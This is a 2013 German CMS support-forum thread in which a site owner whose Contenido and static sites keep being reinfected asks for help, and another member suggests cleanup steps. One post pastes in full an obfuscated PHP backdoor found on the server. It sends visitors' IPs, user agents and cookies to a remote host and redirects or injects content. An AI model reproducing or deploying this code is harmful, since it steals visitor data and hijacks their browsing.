Virus in Webseite

Gesperrt
derSteffen
Beiträge: 847
Registriert: Mi 14. Dez 2005, 16:15
Wohnort: Königs Wusterhausen bei Berlin
Kontaktdaten:

Virus in Webseite

Beitrag von derSteffen » Do 12. Dez 2013, 06:31

Hallo Community,

eine Webseite hat sich was eingefangen, ich weiß aber nicht 100% ob da eine Sicherheitslücke in Contendio besteht oder woanders.

Wenn ich bei Contenido einloggen will, sagt mir mein Virenprogramm: Virus gefunden: Trojan.JS.Blacole.Gen

Auf dem Server liegen 3 Webseite (2 Mandanten und eine statische). Irgendwie sind alle drei betroffen ... ist das denn überhaupt ein CMS-Problem wenn auch die statische betroffen ist? Wie gesagt die liegen unter einen ftp-Account.

Im front_end wird in den Quelltext dann versteckt ein iframe geladen, der auf eine dubiose Src verweist!

Hat jemand ähnliche Erfahrungen?

Ich hatte schon die betroffenen Seiten heruntergeladen und durch einen Virenscanner gejagt, habe auch schon betroffenen Dateien gelöscht und durch neue ersetzt, ftp-Passwörter geändert, etc. Aber leider ohne Erfolg.

Vielen Dank

MfG Steffen

Faar
Beiträge: 1915
Registriert: Sa 8. Sep 2007, 16:23
Wohnort: Brandenburg
Kontaktdaten:

Re: Virus in Webseite

Beitrag von Faar » Do 12. Dez 2013, 15:27

Das ist meistens etwas komplizierter.

Vermutlich hast du irgendwo irgendeine Textdatei übersehen, in der Programmcode steht. Also alle Textdateien kontrollieren, ob da wirklich nur Text drin steht.
Aber es gibt auch JPG Dateien die infiziert sein können oder anderes.
Diese Sucharbeit muss eigentlich direkt über FTP auf dem Server geschehen, denn herunterladen und kontrollieren führt zu nichts.
Wenn es nach Deinem Bereinigen wieder auftaucht, ist dort immer noch der Zugang versteckt und vielleicht immer noch eine Lücke irgendwo offen.
Dass Dumme ist, wenn Du bereits Dateien überschrieben hast, wird es immer schwerer, die Virus-Dateien am Datum zu erkennen.
Dann kann man wirklich nur noch hergehen, alle tausende Dateien einzeln überprüfen oder aber alles platt zu machen und neu aufzusetzen.
Es kann aber auch sein, dass der Eindringlich gar nicht über das CMS kommt sondern über einen Trojaner auf Deinem PC.
Oder aber er hat den Server geknackt und kann dort tun und lassen was er will.

...aus der Ferne kann man also Ratschläge geben ohne Ende, nützen tut es im Zweifel nichts, weil jeder Fall anders sein kann.
Da bräuchte es schon viel genauere Angaben.
Fliegt der Bauer übers Dach, ist der Wind weißgott nicht schwach.

derSteffen
Beiträge: 847
Registriert: Mi 14. Dez 2005, 16:15
Wohnort: Königs Wusterhausen bei Berlin
Kontaktdaten:

Re: Virus in Webseite

Beitrag von derSteffen » Sa 14. Dez 2013, 10:21

Mhm ...

also ich hatte es soweit, dass alles auber war, aber nun ist schon wieder auf den 3 Seiten etwas drauf!
Also ein CMS mit zwei Mandaten und eine staatische Webseite.
Oh man jetzt verzweifel ich aber!
Also an einem Trojaner an meiner Rechner kann es nicht liegen! Ich habe auch jegliche Passwörter geändert. Selbst Stato hat die Seiten wieder freigeben!

Ich habe jetzt auch in dem Root-Verzeichniss eine neue Datei gefunden: cnt.php die gab es schon mal da hieß sie aber esd.php.

Code: Alles auswählen

<?php $cfg='4utAps9M23+av3qGJApJ2ViJ7mTeyu5qM+lPQUUEzN3FG5Xkv57qP/gFTKPe7COOI1A2cQHgOk+rJveYrFF2wxFygVibNtFIvHda0IrewwfxQMiH/TJdLV3wMPFoSS/z3WIyXNOanuLPsFXBNdXusA9sjmypzU0D9SnrDpjlX9mKRYMLtqOlXvVPcAHfv9UjSApudGOIPwElENzPA+j7lISPyES7gYsar2Ha3EoZEWiABg=='; ?>

<? function _1267189193($i){$a=Array('TnpZZGt3SA==','ZEs2','','SCo=','bW9kZQ==','Y29uZmln','a2V5','a2V5','PGZvcm0gbmFtZT0iZm9ybTEiIG1ldGhvZD0icG9zdCIgYWN0aW9uPT9tb2RlPXNldGNvbmZpZyZrZXk9','a2V5','PjxwcmU+ClREUzogICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzIiB2YWx1ZT0i','dXJs','Ij4gIFREUyBJUDogIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzaXAiIHZhbHVlPSI=','aXA=','Ij4KS0VZOiAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBrZXkiIHZhbHVlPSI=','a2V5','Ij4gIFJlc2VydmU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdG8iIHZhbHVlPSI=','bGlu','Ij4KSUQ6ICAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBlc2RpZCIgdmFsdWU9Ig==','aWQ=','Ij4gIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IlN1Ym1pdCIgdmFsdWU9Im9rIj48L3ByZT4KPC9mb3JtPg==','c2V0Y29uZmln','a2V5','a2V5','Lw==','U0NSSVBUX05BTUU=','dXJs','cHRkcw==','aXA=','cHRkc2lw','bGlu','cHRv','aWQ=','cGVzZGlk','a2V5','cGtleQ==','dw==','','U2F2ZWQuCg==','a2lsbA==','a2V5','a2V5','Nzc3','U0NSSVBUX0ZJTEVOQU1F','U0NSSVBUX0ZJTEVOQU1F','b2sK','Lw==','dXJs','aXA=','aXA=','aHR0cDovLw==','SFRUUF9IT1NU','U0NSSVBUX05BTUU=','UkVNT1RFX0FERFI=','bm8=','SFRUUF9YX0ZPUldBUkRFRF9GT1I=','eWVz','SFRUUF9VU0VSX0FHRU5U','aWQ=','aWQ=','a2V5','Jg==','a2V5','PQ==','UVVFUllfU1RSSU5H','R0VUIA==','dXJs','P2RvbT0=','JnJlZj0=','JmlwPQ==','JnByb3g9','JmFnZW50PQ==','JmNvb2tpZT0=','JmVzZGlkPQ==','aWQ=','JmZyYW1laWQ9','IEhUVFAvMS4wDQo=','R0VUIA==','dXJs','P2RvbT0=','JnJlZj0=','JmlwPQ==','JnByb3g9','JmFnZW50PQ==','JmNvb2tpZT0=','JmVzZGlkPQ==','aWQ=','IEhUVFAvMS4wDQo=','SG9zdDog','DQo=','Q29ubmVjdGlvbjogQ2xvc2UNCg0K','DQo=','ZG8=','ZG8=','IA==','bGlu','MjAw','bGlu','Oi8v','aHR0cA==','SFRUUC8xLjEgMzAyIEZvdW5k','TG9jYXRpb246IA==','Y29vaw==','Jg==','PQ==','ZWNobw==');return base64_decode($a[$i]);} ?><?php error_reporting(0);$key=_1267189193(0);function string_cpt($String,$Password){$Salt=_1267189193(1);$StrLen=strlen($String);$Seq=$Password;$Gamma=_1267189193(2);while(strlen($Gamma)<$StrLen){$Seq=pack(_1267189193(3),sha1($Gamma .$Seq .$Salt));$Gamma .= substr($Seq,0,8);}return $String^$Gamma;}$c=unserialize(string_cpt(base64_decode($cfg),$key));$mode=$_REQUEST[_1267189193(4)];if($mode == _1267189193(5)AND $c[_1267189193(6)]== $_REQUEST[_1267189193(7)]){echo _1267189193(8) .$_REQUEST[_1267189193(9)] ._1267189193(10) .$c[_1267189193(11)] ._1267189193(12) .$c[_1267189193(13)] ._1267189193(14) .$c[_1267189193(15)] ._1267189193(16) .$c[_1267189193(17)] ._1267189193(18) .$c[_1267189193(19)] ._1267189193(20);die();}if($mode == _1267189193(21)AND $c[_1267189193(22)]== $_REQUEST[_1267189193(23)]){$sn=explode(_1267189193(24),$_SERVER[_1267189193(25)]);foreach($sn as $snn){$scr=$snn;}$getlpa=file($scr);$strng=$getlpa[0];$file=file($scr);for($i=0;$i<sizeof($file);$i++)if($i == 0){$c[_1267189193(26)]=$_POST[_1267189193(27)];$c[_1267189193(28)]=$_POST[_1267189193(29)];$c[_1267189193(30)]=$_POST[_1267189193(31)];$c[_1267189193(32)]=$_POST[_1267189193(33)];$c[_1267189193(34)]=$_POST[_1267189193(35)];$cfg=base64_encode(string_cpt(serialize($c),$key));$file[$i]="<?\$cfg='$cfg'; ?>\n";}$fp=fopen($scr,_1267189193(36));if(fputs($fp,implode(_1267189193(37),$file)))die(_1267189193(38));fclose($fp);}if($mode == _1267189193(39)AND $c[_1267189193(40)]== $_REQUEST[_1267189193(41)]){chmod(_1267189193(42),$_SERVER[_1267189193(43)]);if(unlink($_SERVER[_1267189193(44)]))die(_1267189193(45));}$dom=explode(_1267189193(46),$c[_1267189193(47)]);$dom=$dom[2];$dhost=$dom;if($c[_1267189193(48)]){$dom=$c[_1267189193(49)];}$fp=fsockopen($dom,80,$errno,$errstr,2);if(!$fp){$res=1;}else{$t_dom=urlencode(_1267189193(50) .$_SERVER[_1267189193(51)] .$_SERVER[_1267189193(52)]);$t_ref=urlencode($_SERVER[HTTP_REFERER]);$t_ip=urlencode($_SERVER[_1267189193(53)]);$t_prox=_1267189193(54);if($_SERVER[_1267189193(55)]){$t_prox=_1267189193(56);}$t_agent=urlencode($_SERVER[_1267189193(57)]);if(isset($_GET[_1267189193(58)]))$t_frameid=urlencode($_GET[_1267189193(59)]);foreach($_COOKIE as $c[_1267189193(60)]=> $val){$t_cookie=$t_cookie ._1267189193(61) .$c[_1267189193(62)] ._1267189193(63) .$val;}$t_cookie=urlencode($t_cookie);if(empty($t_cookie)){$t_cookie=urlencode($_SERVER[_1267189193(64)]);}if(isset($t_frameid)){$out=_1267189193(65) .$c[_1267189193(66)] ._1267189193(67) .$t_dom ._1267189193(68) .$t_ref ._1267189193(69) .$t_ip ._1267189193(70) .$t_prox ._1267189193(71) .$t_agent ._1267189193(72) .$t_cookie ._1267189193(73) .$c[_1267189193(74)] ._1267189193(75) .$t_frameid ._1267189193(76);}else{$out=_1267189193(77) .$c[_1267189193(78)] ._1267189193(79) .$t_dom ._1267189193(80) .$t_ref ._1267189193(81) .$t_ip ._1267189193(82) .$t_prox ._1267189193(83) .$t_agent ._1267189193(84) .$t_cookie ._1267189193(85) .$c[_1267189193(86)] ._1267189193(87);}$out .= _1267189193(88) .$dhost ._1267189193(89);$out .= _1267189193(90);fwrite($fp,$out);while(!feof($fp)){$str=fgets($fp,128);$ch .= $str;if($str == _1267189193(91)&& empty($he)){$he=_1267189193(92);}if($he == _1267189193(93)){$goto .= $str;}}fclose($fp);}$goto=substr($goto,2);$ch=explode(_1267189193(94),$ch);if($res){$goto=$c[_1267189193(95)];}if($ch[1]== _1267189193(96)){}else{$goto=$c[_1267189193(97)];}$gotoe=explode(_1267189193(98),$goto);If($gotoe[0]== _1267189193(99)){header(_1267189193(100));header(_1267189193(101) .$goto);}$goto_body=substr($goto,7);If($gotoe[0]== _1267189193(102)){$gotoee=explode(_1267189193(103),$goto_body);foreach($gotoee as $setcook){$set=explode(_1267189193(104),$setcook);setcookie($set[0],$set[1]);}}If($gotoe[0]== _1267189193(105)){echo $goto_body;} ?>
Gut, jetzt kann ich ja schauen, welche Dateien von gestern zu heute geändert wurden ... aber ein paar Fragen habe ich noch!

Sehe ich denn an den geänderten Dateien, ob dort die Schadsoftware drin ist ... oder kann es auch sein, dass aus einer älteren Datei alles ineziert wird?

Kann denn ein Trojaner auf dem Kundenrechner auch Passwörter ausspionieren, die der Kunde gar nicht hat? (Habe ja alle geändert)

Kann sich denn auch ein Virus oder ein Befehl in der Datenbank aufhalten?

Gibt es vieleicht Tipps was man bei Strato besser einschränken sollte.
Auf der Webseite läuft auch noch Piwik und MySqlDumber .. aber ich habe erste gestern die neusten Versionen heruntergleaden und installiert.

Vielen lieben Dank

Steffen

derSteffen
Beiträge: 847
Registriert: Mi 14. Dez 2005, 16:15
Wohnort: Königs Wusterhausen bei Berlin
Kontaktdaten:

Re: Virus in Webseite

Beitrag von derSteffen » Sa 14. Dez 2013, 12:55

In den Log-Dateien fällt mir jetzt nichts auf!

Vorwiegend arbeiten hier die CronJobs von Contenido und Piwik ... und irgendwann fängt es an, das vermehr in die errorlog.txt geschreiben wird (aber auch hier wirklichnur Fehlermeldungen, die durch das Fehlverhalten der wEBSEITE ANGEZEIGT WERDEN).

MfG Steffen

Faar
Beiträge: 1915
Registriert: Sa 8. Sep 2007, 16:23
Wohnort: Brandenburg
Kontaktdaten:

Re: Virus in Webseite

Beitrag von Faar » Sa 14. Dez 2013, 21:56

oder kann es auch sein, dass aus einer älteren Datei alles ineziert wird?
Das ist durchaus möglich.
Ich glaube mal eine Tendenz ausgemacht zu haben, dass zuerst eingebrochen wird um danach eine Pause einzulegen. Und erst später wird der Schadcode eingebaut, so dass man den eigentlichen Trojaner nicht einfach am Datum erkennt.
Welche Contenido Versionen sind das denn?
Fliegt der Bauer übers Dach, ist der Wind weißgott nicht schwach.

derSteffen
Beiträge: 847
Registriert: Mi 14. Dez 2005, 16:15
Wohnort: Königs Wusterhausen bei Berlin
Kontaktdaten:

Re: Virus in Webseite

Beitrag von derSteffen » Mo 16. Dez 2013, 07:40

Hallo.

es ist eine 4.8.18. Ich habe jetzt ein backup von Februar eingepielt. Auch Piwik habe ich mal runtergeschmissen. Zur Zeit läuft es erstmal.

MfG Steffen

Gesperrt